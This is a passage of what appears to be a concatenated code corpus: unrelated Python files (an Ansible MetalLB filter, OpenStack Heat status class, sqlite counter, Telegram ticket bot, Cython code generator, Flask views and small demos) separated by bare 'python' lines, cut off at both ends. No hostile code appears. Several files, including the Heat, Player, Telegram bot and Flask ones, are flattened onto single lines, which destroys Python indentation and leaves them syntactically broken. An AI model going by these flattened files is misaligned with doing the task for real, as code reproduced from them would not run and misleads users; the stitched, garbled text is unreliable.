    match_expression['values'] = [host]

    node_selector = dict()
    node_selector['match-expressions'] = [match_expression]

    node_selectors = []
    node_selectors.append(node_selector)

    return node_selectors


def _extract_peer_address(host, k8s_nodes):
    # The peer address is the first host address of the node's pod CIDR.
    for node in k8s_nodes:
        if node['metadata']['name'] == host:
            cidr = node['spec']['podCIDR']
            if PY2:
                cidr = unicode(cidr)
            net = ipaddress.ip_network(cidr)
            gen = net.hosts()
            return str(next(gen))
    # NOTE(review): the "%s" is never interpolated here -- message and
    # host are passed as two separate constructor args (same below).
    raise AnsibleFilterError("could not find host in k8s nodes and determine peer address: %s", host)


def metal_lb_conf(hostnames, hostvars, cidrs, k8s_nodes):
    # Assemble a MetalLB configuration (BGP peers + address pools) from
    # the inventory host variables and the cluster node list.
    peers = []
    for host in hostnames:
        host_vars = hostvars[host]
        if not host_vars:
            raise AnsibleFilterError("host has no hostvars: %s", host)
        if 'metal_tags' not in host_vars:
            raise AnsibleFilterError("host has no metal_tags: %s", host)
        if 'metal_hostname' not in host_vars:
            raise AnsibleFilterError("host has no metal_hostname: %s", host)

        asn = _extract_asn(host_vars['metal_tags'])
        if not asn:
            raise AnsibleFilterError("host has no asn specified in its metal_tags: %s", host)

        # Each node peers with itself (peer-asn == my-asn).
        p = dict()
        p['peer-address'] = _extract_peer_address(host_vars['metal_hostname'], k8s_nodes)
        p['peer-asn'] = int(asn)
        p['my-asn'] = int(asn)
        p['node-selectors'] = _generate_node_selectors(host_vars['metal_hostname'])

        peers.append(p)

    address_pool = dict()
    address_pool['name'] = 'default'
    address_pool['protocol'] = 'bgp'
    address_pool['addresses'] = cidrs

    address_pools = [address_pool]

    return {
        'peers': peers,
        'address-pools': address_pools
    }


class FilterModule(object):
    '''Common cloud-native filter plugins'''

    def filters(self):
        # Map Jinja2 filter names to their implementations.
        return {
            'humanfriendly': parse_size,
            'transpile_ignition_config': transpile_ignition_config,
            'metal_lb_conf': metal_lb_conf,
        }
python
# # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from heat.common.i18n import _ SUPPORT_STATUSES = (UNKNOWN, SUPPORTED, DEPRECATED, UNSUPPORTED, HIDDEN ) = ('UNKNOWN', 'SUPPORTED', 'DEPRECATED', 'UNSUPPORTED', 'HIDDEN') class SupportStatus(object): def __init__(self, status=SUPPORTED, message=None, version=None, previous_status=None): """Use SupportStatus for current status of object. :param status: current status of object. :param version: version of OpenStack, from which current status is valid. It may be None, but need to be defined for correct doc generating. :param message: specific status message for object. """ self.status = status self.message = message self.version = version self.previous_status = previous_status self.validate() def validate(self): if (self.previous_status is not None and not isinstance(self.previous_status, SupportStatus)): raise ValueError(_('previous_status must be SupportStatus ' 'instead of %s') % type(self.previous_status)) if self.status not in SUPPORT_STATUSES: self.status = UNKNOWN self.message = _("Specified status is invalid, defaulting to" " %s") % UNKNOWN self.version = None self.previous_status = None def to_dict(self): return {'status': self.status, 'message': self.message, 'version': self.version, 'previous_status': self.previous_status.to_dict() if self.previous_status is not None else None} def is_valid_status(status): return status in SUPPORT_STATUSES
python
import sqlite3


class Database:
    """Tiny sqlite-backed counter of shots per group.

    All queries now use `?` placeholders; the previous implementation
    built SQL with str.format, which was injectable through `groupname`
    and broke on names containing a single quote.
    """

    def __init__(self, dbname):
        """Open (or create) `dbname` and ensure the shotmeter table exists."""
        self.conn = sqlite3.connect(dbname)
        self.conn.execute("CREATE TABLE IF NOT EXISTS shotmeter ("
                          "id INTEGER PRIMARY KEY, "
                          "groupname TEXT not null , "
                          "shotcount INTEGER,"
                          "CONSTRAINT groupname_uq UNIQUE (groupname))")

    def add_entry(self, groupname, shots):
        """Add `shots` to a group's counter, creating the group if needed."""
        cur = self.conn.cursor()
        cur.execute("SELECT shotcount FROM shotmeter "
                    "WHERE groupname = ? LIMIT 1", (groupname,))
        row = cur.fetchone()
        if row is not None:
            self.conn.execute("UPDATE shotmeter SET shotcount = ? "
                              "WHERE groupname = ?",
                              (row[0] + int(shots), groupname))
        else:
            self.conn.execute("INSERT INTO shotmeter (groupname, shotcount) "
                              "VALUES (?, ?)", (groupname, int(shots)))
        self.conn.commit()

    def get_grounames(self):
        """Return all group names (method name kept for compatibility)."""
        cur = self.conn.execute("SELECT groupname FROM shotmeter")
        return [name for (name,) in cur]

    def get_group_shots(self):
        """Return all rows ordered by shot count, highest first."""
        cur = self.conn.cursor()
        cur.execute("SELECT * FROM shotmeter ORDER BY shotcount DESC")
        return cur.fetchall()
python
#/* # * Player - One Hell of a Robot Server # * Copyright (C) 2004 # * Andrew Howard # * # * # * This library is free software; you can redistribute it and/or # * modify it under the terms of the GNU Lesser General Public # * License as published by the Free Software Foundation; either # * version 2.1 of the License, or (at your option) any later version. # * # * This library is distributed in the hope that it will be useful, # * but WITHOUT ANY WARRANTY; without even the implied warranty of # * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # * Lesser General Public License for more details. # * # * You should have received a copy of the GNU Lesser General Public # * License along with this library; if not, write to the Free Software # * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # */ # Desc: Test the position2d interface # Author: Andrew Howard # Date: 15 Sep 2004 # CVS: $Id: test_position2d.py 8114 2009-07-24 11:28:20Z thjc $ from playerc import * def test_position2d(client, index, context): """Basic test of the position2d interface.""" position2d = playerc_position2d(client, index) if position2d.subscribe(PLAYERC_OPEN_MODE) != 0: raise playerc_error_str() for i in range(20): while 1: id = client.read() if id == position2d.info.id: break if context: print context, print "position2d: [%14.3f] " % (position2d.info.datatime), print '[%6.3f %6.3f %6.3f]' % (position2d.px, position2d.py, position2d.pa) position2d.unsubscribe() return
python
from math import *
import math

from .math_eval import *

# Probe every name in the math module to discover the one-argument
# functions (sin, sqrt, ...) so they can be exposed to Equation.
one_arg_mathfuncs = {}
for funcname in dir(math):
    # `from math import *` above placed the public names in globals().
    func = globals()[funcname]
    try:
        func(2)
        # if this works, the function accepts one arg
        one_arg_mathfuncs[funcname] = func
    except Exception as ex:
        # this is most likely either because func requires multiple args
        # or because it's not a function (e.g., math.tau).
        if "math domain error" in repr(ex):
            # the function accepts one arg, but not 2. E.g., acos, asin.
            one_arg_mathfuncs[funcname] = func

# Register the discovered functions with the expression evaluator
# (safe_ufunctions / ufunctions come from math_eval).
safe_ufunctions.update(one_arg_mathfuncs)
ufunctions.update(one_arg_mathfuncs)


class Equation:
    '''Python 2 had a package on the PYPI called Equation that did something
    like safe_compute. This is a revival of that.
    The Equation class is more or less a wrapper around safe_compute with
    some extra math functions thrown in.
    Every single-variable function in Python's built-in "math" module is
    available for use here.
    '''

    def __init__(self, eqn):
        self.eqn = eqn  # the raw equation string
        self.expr = compute(eqn, safe = True)  # compiled callable
        self.varnames = get_varnames(tokenize(eqn), safe = True)

    def __call__(self, *args):
        return self.expr(*args)

    def __repr__(self):
        return f"Equation({self.eqn})"

    __str__ = __repr__
python
# Copyright (c) 2015, Scott J Maddox. All rights reserved.
# Use of this source code is governed by the BSD-3-Clause
# license that can be found in the LICENSE file.

# Code generator (Python 2: note `xrange`) that writes the Cython source
# for the nonparabolic Fermi-Dirac integral approximations into
# fdint/_nonparabolic.pyx: a top-level dispatcher on phi range, range
# dispatchers on the order m, and the order-m approximation bodies.

import os
import sys
fpath = os.path.join(os.path.dirname(__file__), '../fdint/_nonparabolic.pyx')
templates_dir = os.path.join(os.path.dirname(__file__), 'templates/')

import numpy
INF = numpy.inf

with open(fpath, 'w') as f:

    # Generate `nonparabolic`, etc.
    for i in xrange(1):
        k2 = str(i).replace('-','m')
        f.write('''
@cython.cdivision(True)
cdef inline double nonparabolic(double phi, double alpha):''')
        # Dispatch on the phi range; each range has its own approximation.
        for phi_min, phi_max, ext in [(-INF, -2e0, '_lt_m2'),
                                      (-2e0, 0e0, '_m2_to_0'),
                                      ( 0e0, 2e0, '_0_to_2'),
                                      ( 2e0, 5e0, '_2_to_5'),
                                      ( 5e0, 10e0, '_5_to_10'),
                                      (10e0, 20e0, '_10_to_20'),
                                      (20e0, 40e0, '_20_to_40'),
                                      (40e0, INF, '_gt_40')]:
            if phi_max != INF:
                #TODO: binary search optimization
                f.write('''
    if phi < {phi_max:.1f}:
        return nonparabolic{ext}(phi, 2.0*alpha)'''.format(ext=ext,phi_max=phi_max))
            else:
                f.write('''
    return nonparabolic{ext}(phi, 2.0*alpha)
'''.format(ext=ext,phi_max=phi_max))

    # Generate `nonparabolic_lt_m2`, etc.
    for i in xrange(1,2):
        k2 = str(i).replace('-','m')
        for phi_min, phi_max, ext in [(-INF, -2e0, '_lt_m2'),
                                      (-2e0, 0e0, '_m2_to_0'),
                                      ( 0e0, 2e0, '_0_to_2'),
                                      ( 2e0, 5e0, '_2_to_5'),
                                      ( 5e0, 10e0, '_5_to_10'),
                                      (10e0, 20e0, '_10_to_20'),
                                      (20e0, 40e0, '_20_to_40'),
                                      (40e0, INF, '_gt_40')]:
            f.write('''
@cython.cdivision(True)
cdef inline double nonparabolic{ext}(double phi, double beta):'''
                    ''.format(ext=ext))
            for m, k in enumerate(xrange(i, 22, 2)):
                # m is the order of the approximation
                if m == 0:
                    continue # skip 0th order
                if m > 9:
                    break
                #TODO: binary search optimization
                # Pick the lowest order whose error bounds (BS1h/BS3h
                # constants) admit this beta.
                if phi_max != INF:
                    f.write('''
    if(beta <= BS1h{ext}__{m} and beta <= BS3h{ext}__{m}):
        return nonparabolic{ext}__{m}(phi, beta)'''.format(ext=ext, m=m))
                if m % 2 == 1:
                    last_odd_m = m
            # Fallback: highest odd order, with an accuracy warning.
            if phi_max != INF:
                f.write('''
    warnings.warn('nonparabolic: less than 24 bits of accuracy',
                  RuntimeWarning)
    return nonparabolic{ext}__{m}(phi, beta)
'''.format(ext=ext, m=last_odd_m))
            else:
                f.write('''
    warnings.warn('nonparabolic: 24 bits of accuracy not guaranteed',
                  RuntimeWarning)
    return nonparabolic{ext}__{m}(phi, beta)
'''.format(ext=ext, m=last_odd_m))

    # Generate `nonparabolic_lt_m2`, etc.
    for phi_min, phi_max, ext in [(-INF, -2e0, '_lt_m2'),
                                  (-2e0, 0e0, '_m2_to_0'),
                                  ( 0e0, 2e0, '_0_to_2'),
                                  ( 2e0, 5e0, '_2_to_5'),
                                  ( 5e0, 10e0, '_5_to_10'),
                                  (10e0, 20e0, '_10_to_20'),
                                  (20e0, 40e0, '_20_to_40'),
                                  (40e0, INF, '_gt_40')]:
        # NOTE(review): `i` below is the value leaked from the previous
        # loop (i == 1) -- confirm this is intentional.
        for m, _ in enumerate(xrange(i, 22, 2)):
            # m is the order of the approximation
            if m == 0:
                continue # skip 0th order
            if m > 9:
                break
            f.write('''
@cython.cdivision(True)
cdef inline double nonparabolic{ext}__{m}(double phi, double beta):
'''
                    ''.format(ext=ext, m=m))
            # f1h=fd1h_lt_m2(phi), etc.
            for n, nk2 in enumerate(xrange(1, 22, 2)):
                nk2 = str(nk2).replace('-','m')
                if n > m+1:
                    break
                f.write('    cdef double f{nk2}h=fd{nk2}h{ext}(phi)\n'
                        ''.format(nk2=nk2, ext=ext))
            # gf1h=..., gf3h=...
            for i in xrange(1,4,2):
                k2 = str(i).replace('-','m')
                for n, nk2 in enumerate(xrange(i, 22, 2)):
                    if n > m:
                        break
                    nk2 = str(nk2).replace('-','m')
                    if n == 0:
                        f.write('    cdef double gf{k2}h=( G0 *f{nk2}h\n'
                                ''.format(k2=k2, nk2=nk2, ext=ext))
                    else:
                        # '10' collapses to 'A' to keep coefficient names
                        # (G{m}{n}) two characters wide.
                        mstr = str(m).replace('10','A')
                        nstr = str(n).replace('10','A')
                        f.write('        +beta*(G{m}{n}*f{nk2}h\n'
                                ''.format(nk2=nk2, ext=ext,
                                          m=mstr, n=nstr,
                                          ))
                f.write('        )'+')'*m+'\n')
            f.write('    return gf1h+beta*gf3h\n')
python
import re import traceback import telegram from telegram.ext.dispatcher import run_async from mayday import LogConfig from mayday.constants import TICKET_MAPPING, conversations, stages from mayday.constants.replykeyboards import ReplyKeyboards from mayday.controllers.request import RequestHelper from mayday.helpers.update_helper import UpdateHelper from mayday.utils import log_util flogger = LogConfig.flogger KEYBOARDS = ReplyKeyboards() request_helper = RequestHelper() update_helper = UpdateHelper('update_ticket') @run_async def start(bot, update, user_data): try: telegram_info = update._effective_user message = update.callback_query.message callback_data = update.callback_query.data tickets = request_helper.send_search_my_ticket(userid=telegram_info.id) if tickets['status'] and tickets['info']: tickets = tickets['info'] ticket_ids = update_helper.extract_ticket_ids(tickets) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=tickets ) flogger.info(msg) bot.edit_message_text( text=update_helper.tickets_tostr(tickets), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=update_helper.list_tickets_on_reply_keyboard(ticket_ids) ) return stages.UPDATE_SELECT_TICKET else: flogger.debug(tickets) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=message.message_id, text=conversations.NONE_RECORD, reply_markup=KEYBOARDS.return_main_panal ) return stages.MAIN_PANEL except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def select_ticket(bot, update, user_data): try: telegram_info = update._effective_user callback_data = 
update.callback_query.data if callback_data == 'mainpanel': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=update.callback_query.message.message_id, text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}), reply_markup=KEYBOARDS.actions_keyboard_markup ) return stages.MAIN_PANEL if re.match(r'\d+', callback_data): ticket = request_helper.send_search_ticket_by_ticket_id(ticket_id=callback_data) update_helper.set_cache(user_id=telegram_info.id, content=ticket['info']) flatten_ticket = update_helper.flatten(ticket['info']) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=ticket ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_YOURS.format_map(flatten_ticket), chat_id=telegram_info.id, message_id=update.callback_query.message.message_id, reply_markup=KEYBOARDS.update_ticket_keyboard_markup ) return stages.UPDATE_SELECT_FIELD except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def select_field(bot, update, user_data): try: callback_data = update.callback_query.data message = update.callback_query.message telegram_info = update._effective_user update_helper.set_last_choice(user_id=telegram_info.id, content=callback_data) flogger.info(callback_data) if callback_data == 'mainpanel': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=update.callback_query.message.message_id, 
text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}), reply_markup=KEYBOARDS.actions_keyboard_markup ) return stages.MAIN_PANEL elif callback_data == 'check': ticket = update_helper.get_cache(user_id=telegram_info.id, username=telegram_info.username) flatten_ticket = update_helper.flatten(ticket) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=ticket ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_CHECK.format_map(flatten_ticket), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.before_submit_post_keyboard_markup ) return stages.UPDATE_BEFORE_SUBMIT else: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_INFO.format_map( {'message': TICKET_MAPPING.get(callback_data)} ), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.conditions_keyboard_mapping.get(callback_data) ) return stages.UPDATE_FILL_VALUE except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def fill_in_field(bot, update, user_data): try: callback_data = update.callback_query.data message = update.callback_query.message if message: telegram_info = update._effective_user ticket = update_helper.update_cache(user_id=telegram_info.id, username=telegram_info.username, content=callback_data) flatten_ticket = update_helper.flatten(ticket) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=ticket ) flogger.info(msg) bot.edit_message_text( 
text=conversations.UPDATE_YOURS.format_map(flatten_ticket), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.update_ticket_keyboard_markup ) return stages.UPDATE_SELECT_FIELD else: return stages.UPDATE_FILL_VALUE except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def fill_type_in_field(bot, update, user_data): try: telegram_info = update._effective_user text = update.message.text ticket = update_helper.update_cache( user_id=telegram_info.id, username=telegram_info.username, content=text) flatten_ticket = update_helper.flatten(ticket) msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=text, rtn_ticket=ticket ) flogger.info(msg) update.message.reply_text( text=conversations.UPDATE_YOURS.format_map(flatten_ticket), reply_markup=KEYBOARDS.update_ticket_keyboard_markup ) return stages.UPDATE_SELECT_FIELD except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=text, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def submit(bot, update, user_data): try: callback_data = update.callback_query.data message = update.callback_query.message telegram_info = update._effective_user if callback_data == 'mainpanel': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=update.callback_query.message.message_id, text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}), reply_markup=KEYBOARDS.actions_keyboard_markup ) return stages.MAIN_PANEL if callback_data == 'submit': # Kick banned user out! 
if update_helper.get_lastest_auth(telegram_info) is False: update.message.reply_text(conversations.MAIN_PANEL_YELLOWCOW) return stages.END ticket = update_helper.get_cache(user_id=telegram_info.id, username=telegram_info.username) result = request_helper.send_ticket_update(ticket) if result.get('status'): msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=result ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_INTO_DB, chat_id=telegram_info.id, message_id=message.message_id ) else: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, rtn_ticket=result ) flogger.warning(msg) bot.edit_message_text( text=conversations.UPDATE_ERROR, chat_id=telegram_info.id, message_id=message.message_id, ) bot.send_message( text=conversations.AND_THEN, chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.after_submit_keyboard ) return stages.UPDATE_SUBMIT except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg) @run_async def backward(bot, update, user_data): try: callback_data = update.callback_query.data message = update.callback_query.message telegram_info = update._effective_user ticket = update_helper.get_cache(user_id=telegram_info.id, username=telegram_info.username) if callback_data == 'backward': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( text=conversations.UPDATE_YOURS.format_map( update_helper.flatten(ticket)), chat_id=telegram_info.id, message_id=message.message_id, reply_markup=KEYBOARDS.search_ticket_keyboard_markup ) return stages.UPDATE_SELECT_TICKET 
if callback_data == 'mainpanel': msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data ) flogger.info(msg) bot.edit_message_text( chat_id=telegram_info.id, message_id=message.message_id, text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}), reply_markup=KEYBOARDS.actions_keyboard_markup ) return stages.MAIN_PANEL except Exception: msg = log_util.get_ub_log( user_id=telegram_info.id, username=telegram_info.username, funcname=__name__, callback_data=callback_data, extra=str(update), trace_back=str(traceback.format_exc()) ) flogger.error(msg)
python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Demo: list a directory and annotate entries, dircache-style.

The stdlib ``dircache`` module this script originally used was removed
in Python 3.0, so its ``listdir`` (sorted listing) and ``annotate``
(append ``/`` to directories) behaviour is reproduced with ``os``.
"""
import os


def listdir(path):
    """Return the sorted entry names of *path* (what dircache.listdir gave)."""
    return sorted(os.listdir(path))


def annotate(path, names):
    """Append ``/`` in place to every entry of *names* that is a directory.

    :param path: directory the entries were listed from.
    :param names: list of entry names, mutated in place.
    """
    for i, name in enumerate(names):
        if os.path.isdir(os.path.join(path, name)):
            names[i] = name + '/'


def main(path='../..'):
    """Print a two-column ORIGINAL/ANNOTATED table for *path*."""
    contents = listdir(path)
    annotated = contents[:]          # keep the raw listing for comparison
    annotate(path, annotated)
    fmt = '%25s\t%25s'
    print(fmt % ('ORIGINAL', 'ANNOTATED'))
    print(fmt % (('-' * 25,) * 2))
    for original, marked in zip(contents, annotated):
        print(fmt % (original, marked))


if __name__ == '__main__':
    main()
python
import asyncio


async def req1():
    """Simulate a slow request: ~1 s latency, then the value 1."""
    await asyncio.sleep(1)
    return 1


async def req2():
    """Simulate an instant request returning the value 2."""
    return 2


async def main():
    """Run both requests concurrently; print and return their results.

    ``gather`` preserves argument order, so the result is ``[1, 2]``.
    """
    res = await asyncio.gather(req1(), req2())
    print(res)
    return res


if __name__ == "__main__":
    # asyncio.run() creates and closes its own loop. The original
    # get_event_loop().run_until_complete(...) pattern is deprecated
    # outside a running loop and also executed on *import*.
    asyncio.run(main())
python
# Run endless waves of barbarian attacks at a fixed level.
# NOTE(review): AttackBarbarians is a project-local class; presumably
# .start() performs one full attack cycle and returns -- TODO confirm.
from classes.AttackBarbarians import AttackBarbarians

attack = AttackBarbarians(level=36)

# Intentionally loops forever; stop the script externally (e.g. Ctrl-C).
while True:
    attack.start()
python
constants = { # --- ASSETS FILE NAMES AND DELAY BETWEEN FOOTAGE "CALIBRATION_CAMERA_STATIC_PATH": "assets/cam1 - static/calibration.mov", "CALIBRATION_CAMERA_MOVING_PATH": "assets/cam2 - moving light/calibration.mp4", "COIN_1_VIDEO_CAMERA_STATIC_PATH": "assets/cam1 - static/coin1.mov", "COIN_1_VIDEO_CAMERA_MOVING_PATH": "assets/cam2 - moving light/coin1.mp4", "COIN_2_VIDEO_CAMERA_STATIC_PATH": "assets/cam1 - static/coin2.mov", "COIN_2_VIDEO_CAMERA_MOVING_PATH": "assets/cam2 - moving light/coin2.mp4", "COIN_3_VIDEO_CAMERA_STATIC_PATH": "assets/cam1 - static/coin3.mov", "COIN_3_VIDEO_CAMERA_MOVING_PATH": "assets/cam2 - moving light/coin3.mp4", "COIN_4_VIDEO_CAMERA_STATIC_PATH": "assets/cam1 - static/coin4.mov", "COIN_4_VIDEO_CAMERA_MOVING_PATH": "assets/cam2 - moving light/coin4.mp4", "FILE_1_MOVING_CAMERA_DELAY": 2.724, # [seconds] (static) 3.609 - 0.885 (moving) "FILE_2_MOVING_CAMERA_DELAY": 2.024, # [seconds] (static) 2.995 - 0.971 (moving) "FILE_3_MOVING_CAMERA_DELAY": 2.275, # [seconds] (static) 3.355 - 1.08 (moving) "FILE_4_MOVING_CAMERA_DELAY": 2.015, # [seconds] (static) 2.960 - 0.945 (moving) # --- CAMERA CALIBRATION CONSTANTS "CHESSBOARD_SIZE": (6, 9), "CALIBRATION_FRAME_SKIP_INTERVAL": 40, # We just need some, not all # --- ANALYSIS CONSTANTS "SQAURE_GRID_DIMENSION": 200, # It will be a 400x400 square grid inside the marker "ALIGNED_VIDEO_FPS": 30, "ANALYSIS_FRAME_SKIP": 5, # It will skip this frames each iteration during analysis # --- DEBUG CONSTANTS "STATIC_CAMERA_FEED_WINDOW_TITLE": "Static camera feed", "MOVING_CAMERA_FEED_WINDOW_TITLE": "Moving camera feed", "WARPED_FRAME_WINDOW_TITLE": "Warped moving frame", "LIGHT_DIRECTION_WINDOW_TITLE": "Light direction", "LIGHT_DIRECTION_WINDOW_SIZE": 200, # --- INTERACTIVE RELIGHTING CONSTANTS "INTERPOLATED_WINDOW_TITLE": "Interpolated Data", "INPUT_LIGHT_DIRECTION_WINDOW_TITLE": "Light direction input", # --- DATA FILE NAMES CONSTANTS "CALIBRATION_INTRINSICS_CAMERA_STATIC_PATH": "data/static_intrinsics.xml", 
"CALIBRATION_INTRINSICS_CAMERA_MOVING_PATH": "data/moving_intrinsics.xml", "COIN_1_ALIGNED_VIDEO_STATIC_PATH": "data/1_static_aligned_video.mov", "COIN_1_ALIGNED_VIDEO_MOVING_PATH": "data/1_moving_aligned_video.mp4", "COIN_2_ALIGNED_VIDEO_STATIC_PATH": "data/2_static_aligned_video.mov", "COIN_2_ALIGNED_VIDEO_MOVING_PATH": "data/2_moving_aligned_video.mp4", "COIN_3_ALIGNED_VIDEO_STATIC_PATH": "data/3_static_aligned_video.mov", "COIN_3_ALIGNED_VIDEO_MOVING_PATH": "data/3_moving_aligned_video.mp4", "COIN_4_ALIGNED_VIDEO_STATIC_PATH": "data/4_static_aligned_video.mov", "COIN_4_ALIGNED_VIDEO_MOVING_PATH": "data/4_moving_aligned_video.mp4", "COIN_1_EXTRACTED_DATA_FILE_PATH": "data/1_extracted_data.npz", "COIN_2_EXTRACTED_DATA_FILE_PATH": "data/2_extracted_data.npz", "COIN_3_EXTRACTED_DATA_FILE_PATH": "data/3_extracted_data.npz", "COIN_4_EXTRACTED_DATA_FILE_PATH": "data/4_extracted_data.npz", "COIN_1_INTERPOLATED_DATA_RBF_FILE_PATH": "data/1_rbf_interpolated_data.npz", "COIN_2_INTERPOLATED_DATA_RBF_FILE_PATH": "data/2_rbf_interpolated_data.npz", "COIN_3_INTERPOLATED_DATA_RBF_FILE_PATH": "data/3_rbf_interpolated_data.npz", "COIN_4_INTERPOLATED_DATA_RBF_FILE_PATH": "data/4_rbf_interpolated_data.npz", "COIN_1_INTERPOLATED_DATA_PTM_FILE_PATH": "data/1_ptm_interpolated_data.npz", "COIN_2_INTERPOLATED_DATA_PTM_FILE_PATH": "data/2_ptm_interpolated_data.npz", "COIN_3_INTERPOLATED_DATA_PTM_FILE_PATH": "data/3_ptm_interpolated_data.npz", "COIN_4_INTERPOLATED_DATA_PTM_FILE_PATH": "data/4_ptm_interpolated_data.npz", }
python
def counter(T):
    """Return the length of the word in *T* with the most distinct
    (case-insensitive) characters.

    Ties on distinct-character count are broken in favour of the longer
    word. Returns 0 for an empty iterable.

    :param T: iterable of strings.
    :return: length of the winning word (int).
    """
    best_len = 0
    best_distinct = 0
    for word in T:
        distinct = len(set(word.lower()))  # compute once per word
        # More distinct characters wins; on a tie, the longer word wins.
        # (Original used bitwise '&' on booleans -- 'and'/'or' is the
        # idiomatic, short-circuiting form with identical results here.)
        if distinct > best_distinct or (
                distinct == best_distinct and len(word) > best_len):
            best_distinct = distinct
            best_len = len(word)
    return best_len
python
#!/usr/bin/env python """ Example application views. Note that `render_template` is wrapped with `make_response` in all application routes. While not necessary for most Flask apps, it is required in the App Template for static publishing. """ import app_config import json import oauth import static import re import string from datetime import datetime from PIL import Image from flask import Flask, make_response, render_template from render_utils import make_context, smarty_filter, urlencode_filter from werkzeug.debug import DebuggedApplication app = Flask(__name__) app.debug = app_config.DEBUG app.add_template_filter(smarty_filter, name='smarty') app.add_template_filter(urlencode_filter, name='urlencode') @app.route('/') # @oauth.oauth_required def index(): """ Example view demonstrating rendering a simple HTML page. """ context = make_context() context['dateModified'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S") context['now'] = datetime.now().strftime("%d.%m.%Y") with open('data/featured.json') as f: context['featured'] = json.load(f) # Read the books JSON into the page. 
# with open('www/static-data/books.json', 'rb') as readfile: # context['books_js'] = readfile.read() context['API_URL'] = app_config.API_URL return make_response(render_template('index.html', **context)) @app.route('/share/<slug>.html') def share(slug): featured_book = None context = make_context() context['dateModified'] = datetime.now().strftime("%Y-%m-%d %H:%M:%S") context['now'] = datetime.now().strftime("%d.%m.%Y") with open('www/static-data/books.json', 'rb') as f: books = json.load(f) for book in books: if book.get('slug') == slug: featured_book = book break if not featured_book: return 404 featured_book['thumb'] = "%sassets/cover/%s.jpg" % (context['SHARE_URL'], featured_book['slug']) try: book_image = Image.open('www/assets/cover/%s.jpg' % featured_book['slug']) width, height = book_image.size context['thumb_width'] = width context['thumb_height'] = height except IOError: context['thumb_width'] = None context['thumb_height'] = None context['twitter_handle'] = 'nprbooks' context['book'] = featured_book return make_response(render_template('share.html', **context)) @app.route('/tag_share/<slug>.html') def tag_share(slug): featured_tag = None context = make_context() tags = context['COPY']['tags'] for tag in tags: if tag['key'] == slug: featured_tag = tag break if not featured_tag: return 404 context['tag_thumb'] = "%sassets/tag/%s.jpg" % (context['SHARE_URL'], featured_tag['img']) try: book_image = Image.open('www/assets/tag/%s.jpg' % featured_tag['img']) width, height = 